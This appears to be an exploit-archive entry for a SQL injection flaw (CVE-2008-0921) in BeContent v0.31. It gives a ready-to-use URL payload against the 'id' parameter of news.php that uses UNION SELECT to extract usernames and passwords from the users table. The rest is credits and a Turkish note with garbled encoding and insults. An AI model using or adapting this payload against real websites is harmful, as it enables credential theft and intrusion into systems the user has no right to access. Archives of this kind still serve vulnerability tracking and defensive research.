BeContent 031 - 'id' SQL Injection

Author: Cr@zy_King
type: webapps
platform: php
port: 
date_added: 2008-02-20 
date_updated:  
verified: 1 
codes: OSVDB-42010;CVE-2008-0921 
tags: 
aliases:  
screenshot_url:  
application_url:

Founder By Cr@zy_King

HackShow.Us

BeContent v.031 (id) Remote Sql  Vuln.

Down : http://code.google.com/p/becontent/downloads/list?id_menu=9

Exploit:

news.php?id=-3+union+select+1,concat_ws(0x3a,username,password),3,4+from+users

Greatz : Barakuda (GraBBerZ team) & Crackers_Child & Eno7 & DreamTurk & Gencturk & Constantine

Not : Ayyildiz 'da Askeri Åžurada YayinladÄ±gÄ±m AÃ§Ä±klarÄ± KullananlarÄ±n hepsinin a.q yyim bunlarÄ±da kullananlarÄ±nda a.qyyim

AlayÄ±na Ä°syan KralÄ±na Hodri Meydan Sozum Metehan'a ;) Hadi eyw.

side note: seems this vulnerability was found around a month earlier by (GraBBerZ TeaM)

# milw0rm.com [2008-02-21]